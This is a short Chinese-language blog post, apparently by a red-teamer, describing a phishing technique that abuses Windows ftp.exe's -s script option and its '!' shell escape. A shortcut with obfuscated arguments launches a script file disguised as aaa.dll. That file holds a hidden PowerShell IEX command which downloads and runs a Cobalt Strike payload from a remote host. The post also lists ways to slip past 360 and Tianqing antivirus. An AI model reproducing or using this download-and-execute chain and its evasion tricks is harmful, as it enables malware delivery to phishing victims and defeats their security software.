钓鱼之利用ftp命令搞事情
利用方法来自于去年红队会议中红雨滴分析的一个样本文件,当时只是记录了下,后来就一直没时间看,今天看To do的时候发现这个记录,就想办法把这个利用落地。
ftp -s
以前的抓鸡教程中经常会有用-s参数执行多条上传保存命令。
而ftp参数!可以执行系统命令。两个结合下就可以达到命令执行的效果。
ftp> ! 从ftp子系统退出到外壳
创建一个快捷方式(参数混淆绕过360)
C:\Windows\System32\ftp.exe -""s:aaa.dll
新建一个txt 文件名aaa.dll,内容是cs的powershell上线命令。
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).dow"nloa"dstring('http://xxxxxxx:802/a1111'))"
但是现在第三方调用powershell这种方法已经被360拦截。
看了下特征可以绕过天擎。
1、ftp执行参数混淆
2、第三方调用powershell不触发参数行为
3、点击最小化。
图标问题可以查看我上次写的文章制作ICO,使用网络图片。
快捷方式图标下载执行exe
不过这种执行在任务栏会驻留。
但是不用担心,ftp进程被关闭后,powershell还是会独立运行,他的父进程不是ftp
未知黑客团队钓鱼样本分析